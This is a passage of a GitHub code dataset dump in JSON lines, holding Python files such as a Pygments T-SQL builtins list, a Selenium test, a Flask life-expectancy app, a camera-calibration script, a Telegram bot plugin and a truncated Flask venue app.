'partial',\n 'pascal',\n 'position',\n 'precision',\n 'prepare',\n 'preserve',\n 'primary',\n 'prior',\n 'privileges',\n 'procedure',\n 'public',\n 'read',\n 'real',\n 'references',\n 'relative',\n 'restrict',\n 'revoke',\n 'right',\n 'rollback',\n 'rows',\n 'schema',\n 'scroll',\n 'second',\n 'section',\n 'select',\n 'session',\n 'session_user',\n 'set',\n 'size',\n 'smallint',\n 'some',\n 'space',\n 'sql',\n 'sqlca',\n 'sqlcode',\n 'sqlerror',\n 'sqlstate',\n 'sqlwarning',\n 'substring',\n 'sum',\n 'system_user',\n 'table',\n 'temporary',\n 'then',\n 'time',\n 'timestamp',\n 'timezone_hour',\n 'timezone_minute',\n 'to',\n 'trailing',\n 'transaction',\n 'translate',\n 'translation',\n 'trim',\n 'true',\n 'union',\n 'unique',\n 'unknown',\n 'update',\n 'upper',\n 'usage',\n 'user',\n 'using',\n 'value',\n 'values',\n 'varchar',\n 'varying',\n 'view',\n 'when',\n 'whenever',\n 'where',\n 'with',\n 'work',\n 'write',\n 'year',\n 'zone',\n)\n\n# See https://msdn.microsoft.com/en-us/library/ms189822.aspx.\nKEYWORDS = sorted(set(_KEYWORDS_FUTURE + _KEYWORDS_ODBC + _KEYWORDS_SERVER))\n\n# See https://msdn.microsoft.com/en-us/library/ms187752.aspx.\nTYPES = (\n 'bigint',\n 'binary',\n 'bit',\n 'char',\n 'cursor',\n 'date',\n 'datetime',\n 'datetime2',\n 'datetimeoffset',\n 'decimal',\n 'float',\n 'hierarchyid',\n 'image',\n 'int',\n 'money',\n 'nchar',\n 'ntext',\n 'numeric',\n 'nvarchar',\n 'real',\n 'smalldatetime',\n 'smallint',\n 'smallmoney',\n 'sql_variant',\n 'table',\n 'text',\n 'time',\n 'timestamp',\n 'tinyint',\n 'uniqueidentifier',\n 'varbinary',\n 'varchar',\n 'xml',\n)\n\n# See https://msdn.microsoft.com/en-us/library/ms174318.aspx.\nFUNCTIONS = (\n '$partition',\n 'abs',\n 'acos',\n 'app_name',\n 'applock_mode',\n 'applock_test',\n 'ascii',\n 'asin',\n 'assemblyproperty',\n 'atan',\n 'atn2',\n 'avg',\n 'binary_checksum',\n 'cast',\n 'ceiling',\n 'certencoded',\n 'certprivatekey',\n 'char',\n 'charindex',\n 'checksum',\n 'checksum_agg',\n 'choose',\n 'col_length',\n 'col_name',\n 'columnproperty',\n 'compress',\n 'concat',\n 'connectionproperty',\n 'context_info',\n 'convert',\n 'cos',\n 'cot',\n 'count',\n 'count_big',\n 'current_request_id',\n 'current_timestamp',\n 'current_transaction_id',\n 'current_user',\n 'cursor_status',\n 'database_principal_id',\n 'databasepropertyex',\n 'dateadd',\n 'datediff',\n 'datediff_big',\n 'datefromparts',\n 'datename',\n 'datepart',\n 'datetime2fromparts',\n 'datetimefromparts',\n 'datetimeoffsetfromparts',\n 'day',\n 'db_id',\n 'db_name',\n 'decompress',\n 'degrees',\n 'dense_rank',\n 'difference',\n 'eomonth',\n 'error_line',\n 'error_message',\n 'error_number',\n 'error_procedure',\n 'error_severity',\n 'error_state',\n 'exp',\n 'file_id',\n 'file_idex',\n 'file_name',\n 'filegroup_id',\n 'filegroup_name',\n 'filegroupproperty',\n 'fileproperty',\n 'floor',\n 'format',\n 'formatmessage',\n 'fulltextcatalogproperty',\n 'fulltextserviceproperty',\n 'get_filestream_transaction_context',\n 'getansinull',\n 'getdate',\n 'getutcdate',\n 'grouping',\n 'grouping_id',\n 'has_perms_by_name',\n 'host_id',\n 'host_name',\n 'iif',\n 'index_col',\n 'indexkey_property',\n 'indexproperty',\n 'is_member',\n 'is_rolemember',\n 'is_srvrolemember',\n 'isdate',\n 'isjson',\n 'isnull',\n 'isnumeric',\n 'json_modify',\n 'json_query',\n 'json_value',\n 'left',\n 'len',\n 'log',\n 'log10',\n 'lower',\n 'ltrim',\n 'max',\n 'min',\n 'min_active_rowversion',\n 'month',\n 'nchar',\n 'newid',\n 'newsequentialid',\n 'ntile',\n 'object_definition',\n 'object_id',\n 'object_name',\n 'object_schema_name',\n 'objectproperty',\n 'objectpropertyex',\n 'opendatasource',\n 'openjson',\n 'openquery',\n 'openrowset',\n 'openxml',\n 'original_db_name',\n 'original_login',\n 'parse',\n 'parsename',\n 'patindex',\n 'permissions',\n 'pi',\n 'power',\n 'pwdcompare',\n 'pwdencrypt',\n 'quotename',\n 'radians',\n 'rand',\n 'rank',\n 'replace',\n 'replicate',\n 'reverse',\n 'right',\n 'round',\n 'row_number',\n 'rowcount_big',\n 'rtrim',\n 'schema_id',\n 'schema_name',\n 'scope_identity',\n 'serverproperty',\n 'session_context',\n 'session_user',\n 'sign',\n 'sin',\n 'smalldatetimefromparts',\n 'soundex',\n 'sp_helplanguage',\n 'space',\n 'sqrt',\n 'square',\n 'stats_date',\n 'stdev',\n 'stdevp',\n 'str',\n 'string_escape',\n 'string_split',\n 'stuff',\n 'substring',\n 'sum',\n 'suser_id',\n 'suser_name',\n 'suser_sid',\n 'suser_sname',\n 'switchoffset',\n 'sysdatetime',\n 'sysdatetimeoffset',\n 'system_user',\n 'sysutcdatetime',\n 'tan',\n 'textptr',\n 'textvalid',\n 'timefromparts',\n 'todatetimeoffset',\n 'try_cast',\n 'try_convert',\n 'try_parse',\n 'type_id',\n 'type_name',\n 'typeproperty',\n 'unicode',\n 'upper',\n 'user_id',\n 'user_name',\n 'var',\n 'varp',\n 'xact_state',\n 'year',\n)\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/pygments/lexers/_tsql_builtins.py","file_name":"_tsql_builtins.py","file_ext":"py","file_size_in_byte":15129,"program_lang":"python","lang":"hi","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"}
+{"seq_id":"8803604168","text":"from selenium.webdriver.remote.webdriver import WebDriver\nfrom lib.factory.factory_driver import get_driver\nfrom lib.config import config\nfrom lib.pom.qaminds.home_page import HomePage\n\n\nclass TestSearch:\n\n def setup_method(self):\n self.driver: WebDriver = get_driver()\n self.driver.get(config.get_url())\n\n def search(self):\n #busqueda de componenten samsung\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('Samsung')\n\n #busqueda de producto Canon\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('Canon')\n\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('mac')\n\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('ipod')\n\n home_page = HomePage(self.driver)\n assert home_page.is_logo_visible(), 'Logo should be visible'\n home_page.search('palm')\n\n home_page = HomePage(self.driver)\n assert home_page.select_product(\"Palm Treo Pro\"), \"Product should be visible\"\n home_page._click()\n\n \"\"\"for search in [\"Canon\", \"samsung\", \"iMac\", \"ipod\", \"palm\"]:\n self.home_page.search(search)\"\"\"\n\n def teardown_method(self):\n if self.driver:\n self.driver.quit() ","repo_name":"FGabyMartinez/python-selenium-2022","sub_path":"test_Opencart/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"38806890393","text":"from account.models import AccountCookie\nfrom baiduwp_python.settings.settings import logger\nfrom baiduwp_python.utils.date_utils import get_datetime_now_str\n\n\ndef get_account_cookie(username, vip_type, is_valid, order_by='-update_time'):\n match_dict = {\"is_active\": True}\n if username:\n match_dict.update({\"username__contains\": username})\n if vip_type:\n match_dict.update({\"vip_type\": vip_type})\n if is_valid:\n match_dict.update({\"is_valid\": is_valid})\n try:\n account_cookie_list = list(AccountCookie.objects.filter(**match_dict).order_by(order_by).values().all())\n return True, account_cookie_list\n except Exception as e:\n logger.error(f\"get_account_cookie() meet error: {e}\")\n return False, \"操作数据库出错\"\n\n\ndef add_account_cookie(baidu_name, net_disk_name, uk, vip_type, bdclnd, cookie):\n try:\n count = AccountCookie.objects.filter(uk=uk, is_active=True).count()\n if count:\n return False, \"请勿重复添加\"\n date_time_now = get_datetime_now_str()\n AccountCookie.objects.create(\n baidu_name=baidu_name, net_disk_name=net_disk_name, uk=uk, vip_type=vip_type, is_valid=True, bdclnd=bdclnd,\n cookie=cookie, create_time=date_time_now, update_time=date_time_now,\n is_active=True\n )\n return True, \"新增成功\"\n except Exception as e:\n logger.error(f\"add_account_cookie() meet error: {e}\")\n return False, \"操作数据库出错\"\n\n\ndef del_account_cookie(ids: list):\n try:\n count = AccountCookie.objects.filter(is_active=True, id__in=ids).update(is_active=False)\n return True, count\n except Exception as e:\n logger.error(f\"del_account_cookie() meet error: {e}\")\n return False, \"操作数据库出错\"\n","repo_name":"panmeibing/baiduwp_python","sub_path":"baiduwp_python/baiduwp_python/apps/account/utils/account_orm.py","file_name":"account_orm.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26595667739","text":"#################################\n# ---- Made By Skult78911 ---- ## \n# ---- All RIght Reserved ---- ##\n# ---- Writted In VS Code ---- ## \n# ---- Writted In Python3 ---- ## \n#################################\n\nimport numpy as np # Importing Numpy Libary\nimport matplotlib.pyplot as plt # # Importing Matplotlib Libary\n\nN = 5 # Number of Looks for 1st and 2nd Classes\nb = 3 # Offset Variable b\n\n# -- Modeling 1 Image -- #\nx1 = np.random.random(N) # Modeling a Random Value Along One Axis x1\nx2 = x1 + [np.random.randint(10)/10 for i in range(N)] + b # x2 Modeled as x1 And Plus Random Deviation And at the end we add the variable b\nC1 = [x1, x2] # Forming a Double List C1 From the Set of These Points (These Points x1 And x2)\n\n# -- Modeling 1 Image -- #\nx1 = np.random.random(N) # Modeling a Random Value Along One Axis x1\nx2 = x1 - [np.random.randint(10)/10 for i in range(N)] - 0.1 + b # x2 Modeled as x1 And Minus Random Deviation And at the end we add the variable b\n # And Additionally We Make Minus 0.1 So That This Point x2 Is Below Our Line\n\nC2 = [x1, x2] # Forming a Double List C2 From the Set of These Points (These Points x1 And x2)\n\nf = [0+b, 1+b] # We form a straight line under 45 degrees to see how the dividing line goes But Also Adding b Variable\n\n# -- Determine 2 Coefficients -- #\nw2 = 0.5 # Let Omega 2 Coefficient Be 0.5\nw3 = -b*w2 # After that We Automatically Calculate Omega 3 Equals Minus b to Omega 2\n\nw = np.array([-w2, w2, w3]) # Well, All Weight Coefficients Will Be What's Inside (It's -w2, w2 and w3 )\nfor i in range(N):\n x = np.array([C1[0][i], C1[1][i], 1]) # Passing All Images Through Class C1\n y = np.dot(w, x) # Calculate This Output Value y\n if y >= 0: # We look If the value of y is greater than or equal to zero, then this is class C1\n print(\"Класс C1\") # And output it to the console\n else: # Otherwise It's Class C2 \n print(\"Кла��с C2\") # And output it to the console\n\nplt.scatter(C1[0][:], C1[1][:], s=10, c='red') # Display All Points C1\nplt.scatter(C2[0][:], C2[1][:], s=10, c='blue') # Display All Points C2\nplt.plot(f) # Splitting the Program With the plot Function\nplt.grid(True) # Gridding The Box Where All Neurons\nplt.show() # Showing Window With All Neurons (Like Windows Application)","repo_name":"Skult78911/CMNN-Libary","sub_path":"Source/NN XOR/Neural Network Perseptron - Classification, XOR Task - 2.py","file_name":"Neural Network Perseptron - Classification, XOR Task - 2.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10176798063","text":"from flask import Flask, render_template, request, jsonify\nimport pandas as pd\nfrom joblib import load\n\napp = Flask(__name__, template_folder=\"templates\")\n\n# Modell laden\nrf = load(\"../Models/random_forest_model.joblib\")\n\n# Laden der Daten\ndf = pd.read_csv(\"../data/life_expectancy_cleaned.csv\")\n\n# Eindeutige Ländernamen extrahieren und in eine Liste konvertieren\ncountry_list = df[\"Country\"].unique().tolist()\n\n\ndef predict_life_expectancy(input_data):\n # Konvertiere das Eingabedaten-Dict in einen DataFrame\n df = pd.DataFrame(input_data, index=[0])\n # Anwenden des One-Hot-Encodings auf die Eingabedaten\n df_encoded = pd.get_dummies(df)\n\n # Liste der Features laden\n all_features = load(\"../Models/feature_list.joblib\")\n\n # Füge fehlende Spalten hinzu und fülle sie mit Nullen\n for col in all_features:\n if col not in df_encoded.columns:\n df_encoded[col] = 0\n\n # Sortiere die Spalten, um sicherzustellen, dass sie in der gleichen Reihenfolge wie in den Trainingsdaten sind\n df_encoded = df_encoded[all_features]\n\n # Entferne die Zielvariable aus den Eingabevariablen\n df_encoded = df_encoded.drop(columns=[\"Life expectancy\"])\n\n # Vorhersage durchführen\n prediction = rf.predict(df_encoded)\n prediction = prediction * 100 # Zurückkonvertieren in Jahre\n\n return prediction\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\", country_list=country_list)\n\n\ndef convert_to_float(val):\n try:\n return float(val)\n except ValueError:\n return val\n\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n # Extrahiere die Daten aus der Anfrage\n data = request.form.to_dict()\n data = {k: [convert_to_float(v)] for k, v in data.items()}\n\n # Vorhersage durchführen\n prediction = predict_life_expectancy(data)\n\n # Verwandle die Vorhersage in JSON und gib sie zurück\n return jsonify({\"prediction\": prediction.tolist()})\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"peledin/LifeExpectancy","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1031806878","text":"from sklearn.svm import SVC\r\nfrom matplotlib.colors import ListedColormap\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nnp.random.seed(1)\r\nxXor = np.random.randn(200, 2)\r\nyXor = np.logical_xor(xXor[:, 0] > 0, xXor[:, 1] > 0)\r\nyXor = np.where(yXor, 1, -1)\r\nplt.scatter(xXor[yXor == 1, 0], xXor[yXor == 1, 1], c='b', marker='x', label='1')\r\nplt.scatter(xXor[yXor == -1, 0], xXor[yXor == -1, 1], c='r', marker='s', label='-1')\r\nplt.xlim([-3, 3])\r\nplt.ylim([-3, 3])\r\nplt.legend(loc='best')\r\nplt.show()\r\n\r\n\r\ndef plotDecisionRegions(x, y, classifier, test_idx=None, resolution=0.02):\r\n markers = ('s', 'x', 'o', '^', 'v')\r\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\r\n cmap = ListedColormap(colors[:len(np.unique(y))])\r\n\r\n x1Min, x1Max = x[:, 0].min() - 1, x[:, 0].max() + 1\r\n x2Min, x2Max = x[:, 1].min() - 1, x[:, 1].max() + 1\r\n xx1, xx2 = np.meshgrid(np.arange(x1Min, x1Max, resolution), np.arange(x2Min, x2Max, resolution))\r\n z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\r\n z = z.reshape(xx1.shape)\r\n plt.contourf(xx1, xx2, z, alpha=0.3, cmap=cmap)\r\n plt.xlim(xx1.min(), xx1.max())\r\n plt.ylim(xx2.min(), xx2.max())\r\n\r\n for idx, c1 in enumerate(np.unique(y)):\r\n plt.scatter(x=x[y == c1, 0], y=x[y == c1, 1], alpha=0.8, c=colors[idx], marker=markers[idx], label=c1,\r\n edgecolor='black')\r\n if test_idx:\r\n xTest, yTest = x[test_idx, :], y[test_idx]\r\n plt.scatter(xTest[:, 0],\r\n xTest[:, 1],\r\n c=\"black\",\r\n edgecolor='black',\r\n alpha=1.0,\r\n linewidth=1,\r\n marker='o',\r\n s=100,\r\n label='Zestaw testowy')\r\n\r\n\r\nsvm = SVC(kernel='rbf', random_state=1, gamma=0.10, C=10.0)\r\nsvm.fit(xXor, yXor)\r\nplotDecisionRegions(xXor, yXor, classifier=svm)\r\nplt.legend(loc='upper left')\r\nplt.show()\r\n","repo_name":"expresoviter/KPI_Study","sub_path":"Semester_4/Applied tasks of Machine Learning/Lab3/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"15450153011","text":"#!/usr/bin/env python\n# coding: utf-8\n#import sys\n#sys.path.append(\"../\")\n\nimport flexiblecc as fcc\nimport glob\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport flexiblecc.Parametric as parcc\nimport os\nimport uuid\nimport json\nimport shutil\nfrom flexiblecc.CentralModel import BundleAdjustment\n\nfolder_out = \"TestRes\"\nrun_name = str(uuid.uuid4())\nfolder_out = os.path.join(folder_out, run_name)\nos.makedirs(folder_out, exist_ok=True)\n\nimport sys\n#sys.stdout = open(os.path.join(folder_out, \"console.txt\"), 'w')\n\ndatasetpath = \"../CalImgs/ChArUco - Sorted/Samsung Galaxy S10 Plus/WideAngle/Fold_1/*.jpg\"\n\nparas = {\n \"cm_stepsize\": 252,\n \"cm_order\": 2,\n \"ls_ftol\": 1e-8,\n \"ls_gtol\": 1e-8,\n \"datasetpath\":datasetpath,\n}\n\nprint(\"paras:\", paras)\n\nwith open(os.path.join(folder_out, \"para.json\"), \"w\", encoding='utf-8') as f:\n json.dump(paras, f, ensure_ascii=False, indent=4)\n\nshutil.copy2(os.path.realpath(__file__), os.path.join(folder_out, \"run_script.txt\"))\n\nimage_files = glob.glob(paras[\"datasetpath\"])\n\ncolor_images = [cv2.imread(f) for f in tqdm(image_files)]\ngayscale_images = [cv2.cvtColor(c_img, cv2.COLOR_BGR2GRAY) for c_img in tqdm(color_images)]\n\nimage_shape = color_images[0].shape[:2]\n\nsquaresX = 28 # [#]\nsquaresY = 19 # [#]\nsquareLength = 0.01 # [m]\nmarkerLength = 0.0075 # [m]\ndictionary = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_1000)\n\ncalibrate_retval, cameraMatrix, distCoeffs, rvecs, tvecs, stdDeviationsIntrinsics, stdDeviationsExtrinsics, perViewErrors, charucoCorners_all, charucoIds_all, markerCorners_all, armarkerIds_all, obj_points_all, board, not_used = parcc.calibrate_camera_charuco(\n gayscale_images, squaresX, squaresY,\n squareLength, markerLength, dictionary, verbose=1)\n\nplt.figure()\nfcc.Metrics.rtvecs_illustration.draw_rtvecs(rvecs, tvecs, obj_points_all)\nplt.tight_layout()\nplt.savefig(os.path.join(folder_out, \"ParBoards.png\"))\nplt.close()\n\nimg_points_all, diff_all, angels_all, mag_all = fcc.Metrics.voronoi.projectPoints_and_cal_angles_and_mag(\n charucoCorners_all, obj_points_all, rvecs, tvecs, cameraMatrix, distCoeffs)\n\nplt.figure()\nfcc.Metrics.voronoi.plot_voronoi(img_points_all, angels_all)\nplt.savefig(os.path.join(folder_out, \"Par_Voronoi.png\"))\nplt.close()\n\n\nprint(f\"RMS: {calibrate_retval:0.4f} pixels\")\n\n\n\nba = BundleAdjustment(obj_points_all, rvecs, tvecs, charucoCorners_all, cameraMatrix, distCoeffs, image_shape,\n cm_stepsize=paras[\"cm_stepsize\"], cm_order=paras[\"cm_order\"], ls_ftol=paras[\"ls_ftol\"], ls_gtol=paras[\"ls_gtol\"])\n\ncm, res, rvecs_new, tvecs_new = ba.least_squares(folder_out)\n\nfcc.CentralModel.cm_save(cm, os.path.join(folder_out, \"cm\"))\n\n\nrmsCM, residuals_2D, estimated_points_2D, correct_points_2D = ba.calc_residuals_2D(np.array(res.x), return_points_2D=True, verbose=1)\n\nnp.save(os.path.join(folder_out, \"calc_residuals_2D.npy\"), [rmsCM, residuals_2D, estimated_points_2D, correct_points_2D])\n\nrms_vs = f\"{calibrate_retval:0.5f} VS {rmsCM:0.5f}\"\nwith open(os.path.join(folder_out, rms_vs+\".txt\"), \"w\") as f:\n f.write(rms_vs)\nprint(rms_vs)\n\nimage_points = np.concatenate(correct_points_2D)\nproject_points = np.concatenate(estimated_points_2D)\n\nimp, diff, angels, mag = fcc.Metrics.voronoi.cal_angles_and_mag(image_points, project_points)\n\nplt.figure()\nfcc.Metrics.voronoi.plot_voronoi(imp, angels)\nplt.savefig(os.path.join(folder_out, \"CM_Voronoi.png\"))\nplt.close()\n\n#sys.stdout.close()","repo_name":"SimonLBSoerensen/Flexible-Camera-Calibration","sub_path":"Test/bundleAdjustment.py","file_name":"bundleAdjustment.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"}
+{"seq_id":"26532818578","text":"def init_lst():\n return [i for i in range(0, 256)]\n\n\nclass KnotTier:\n def __init__(self):\n self.pos = 0\n self.skip = 0\n\n def tie_a_knot(self, start, length, lst):\n if length < 2:\n return\n end = (start + length - 1) % len(lst)\n lst[start], lst[end] = lst[end], lst[start]\n if length == 2:\n return\n start += 1\n start %= len(lst)\n self.tie_a_knot(start, length - 2, lst)\n\n def tie_knots(self, lst, lengths):\n for length in lengths:\n self.tie_a_knot(self.pos, length, lst)\n self.pos += length + self.skip\n self.pos %= len(lst)\n self.skip += 1\n","repo_name":"howsad/aoc2017","sub_path":"src/day10/day10_commons.py","file_name":"day10_commons.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70278593709","text":"import collections\n\nimport pypath.share.curl as curl\nimport pypath.resources.urls as urls\n\n\ndef pazar_interactions():\n\n PazarInteraction = collections.namedtuple(\n 'PazarInteraction',\n ('tf', 'target', 'pmid'),\n )\n\n url = urls.urls['pazar']['url_rescued']\n c = curl.Curl(url, silent = False)\n data = c.result\n\n return [\n PazarInteraction(*map(x.split('\\t').__getitem__, (1, 4, 10)))\n for x in ''.join(data.values()).split('\\n')\n if len(x) > 0\n ]\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/pazar.py","file_name":"pazar.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"}
+{"seq_id":"11087435685","text":"from telegram import Chat, Update, User\nfrom telegram.error import NetworkError, Forbidden\nfrom telegram.ext import CallbackContext, ChatMemberHandler\n\nfrom core.config import JoinGroups, config\nfrom core.plugin import Plugin, handler\nfrom core.services.cookies import CookiesService\nfrom core.services.players import PlayersService\nfrom core.services.users.services import UserAdminService\nfrom utils.chatmember import extract_status_change\nfrom utils.log import logger\n\n\nclass ChatMember(Plugin):\n def __init__(\n self,\n user_admin_service: UserAdminService = None,\n players_service: PlayersService = None,\n cookies_service: CookiesService = None,\n ):\n self.cookies_service = cookies_service\n self.players_service = players_service\n self.user_admin_service = user_admin_service\n\n @handler.chat_member(chat_member_types=ChatMemberHandler.MY_CHAT_MEMBER, block=False)\n async def track_chats(self, update: Update, context: CallbackContext) -> None:\n result = extract_status_change(update.my_chat_member)\n if result is None:\n return\n was_member, is_member = result\n user = update.effective_user\n chat = update.effective_chat\n if chat.type == Chat.PRIVATE:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 启用了机器人\", user.full_name, user.id)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 屏蔽了机器人\", user.full_name, user.id)\n elif chat.type in [Chat.GROUP, Chat.SUPERGROUP]:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 邀请BOT进入群 %s[%s]\", user.full_name, user.id, chat.title, chat.id)\n await self.greet(user, chat, context)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 从 %s[%s] 群移除Bot\", user.full_name, user.id, chat.title, chat.id)\n else:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 邀请BOT进入频道 %s[%s]\", user.full_name, user.id, chat.title, chat.id)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 从 %s[%s] 频道移除Bot\", user.full_name, user.id, chat.title, chat.id)\n\n async def greet(self, user: User, chat: Chat, context: CallbackContext) -> None:\n quit_status = True\n if config.join_groups == JoinGroups.NO_ALLOW:\n try:\n if await self.user_admin_service.is_admin(user.id):\n quit_status = False\n else:\n logger.warning(\"不是管理员邀请!退出群聊\")\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_AUTH_USER:\n try:\n if await self.cookies_service.get(user.id) is not None:\n quit_status = False\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_USER:\n try:\n if await self.players_service.get(user.id) is not None:\n quit_status = False\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_ALL:\n quit_status = False\n else:\n quit_status = True\n if quit_status:\n try:\n await context.bot.send_message(chat.id, \"派蒙不想进去!不是旅行者的邀请!\")\n except Forbidden as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except NetworkError as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except Exception as exc:\n logger.info(\"发送消息失败\", exc_info=exc)\n await context.bot.leave_chat(chat.id)\n else:\n try:\n await context.bot.send_message(chat.id, \"感谢邀请小派蒙到本群!请使用 /help 查看咱已经学会的功能。\")\n except Forbidden as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except NetworkError as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except Exception as exc:\n logger.info(\"发送消息失败\", exc_info=exc)\n","repo_name":"PaiGramTeam/PaiGram","sub_path":"plugins/system/chat_member.py","file_name":"chat_member.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"37"}
+{"seq_id":"20336008079","text":"from typing import Optional, Any\n\nfrom objectmodel.base import ObjectModelABC, FieldABC\n\n\n__all__ = [\n 'FieldValidationError',\n 'FieldValueRequiredError',\n 'DuplicateFieldDefinitionError'\n]\n\n\nclass FieldValidationError(AttributeError):\n \"\"\" Field validation error \"\"\"\n\n def __init__(self, instance: Optional[ObjectModelABC], field: FieldABC, value: Any, message: str):\n super().__init__(f'Invalid value {value} for field {field!r} of {instance!r}: {message}')\n\n\nclass FieldValueRequiredError(AttributeError):\n \"\"\" Field is required but not set \"\"\"\n\n def __init__(self, instance: ObjectModelABC, field: FieldABC):\n super().__init__(f'Field {field!r} of {instance!r} is not set')\n\n\nclass DuplicateFieldDefinitionError(AttributeError):\n \"\"\" A field with this name is already present in model \"\"\"\n def __init__(self, field_name: str, class_name: str):\n super().__init__(f'Duplicate field definition found during {class_name} initialization, '\n f'field: {field_name}')\n","repo_name":"bshishov/objectmodel","sub_path":"src/objectmodel/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74523841066","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\nimport sys\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for, abort\nfrom flask_migrate import Migrate\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\n\n#Instantiate a Migrate object\nmigrate = Migrate(app, db)\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\nfrom models import *\n\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n # write a query that selects all venue\n all_venues = (\n Venue.query.with_entities(Venue.city, Venue.state)\n .group_by(Venue.city, Venue.state)\n .all()\n )\n\n data = []\n # display all venues by city/state and name only. Call 'area' per venues. -html -Done\n for area in all_venues:\n venues_in_city = (\n Venue.query.filter(Venue.city == area[0])\n .filter(Venue.state == area[1])\n .all()\n )\n data.append({\"city\": area.city, \"state\": area.state, \"venues\": venues_in_city})\n\n # removed dummy code for neatness\n\n return render_template('pages/venues.html', areas=data);\n\n# Search Venue\n# ----------------------------------------------------------------\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n\n #write a search query using ilike() operator - Thank you Miguel Grinberg!\n search_term = request.form.get('search_term', '')\n venues = db.session.query(Venue).filter(Venue.name.ilike('%' + search_term + '%')).all()\n data = []\n\n #loop over venues and display. Similar to show_venue\n for venue in venues:\n num_upcoming_shows = 0\n shows = db.session.query(Show).filter(Show.venue_id == venue.id)\n for show in shows:\n if (show.start_time > datetime.now()):\n num_upcoming_shows += 1;\n\n data.append({\n \"id\": venue.id,\n \"name\": venue.name,\n \"num_upcoming_shows\": num_upcoming_shows\n })\n #use len() to count\n response={\n \"count\": len(venues),\n \"data\": data\n }\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/')\ndef show_venue(venue_id):\n\n #write a query that pulls all venue information by ID\n venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n\n list_shows = db.session.query(Show).filter(Show.venue_id == venue_id)\n past_shows = []\n upcoming_shows = []\n\n # will need to do an artist query \n for show in list_shows:\n artist = db.session.query(Artist.name, 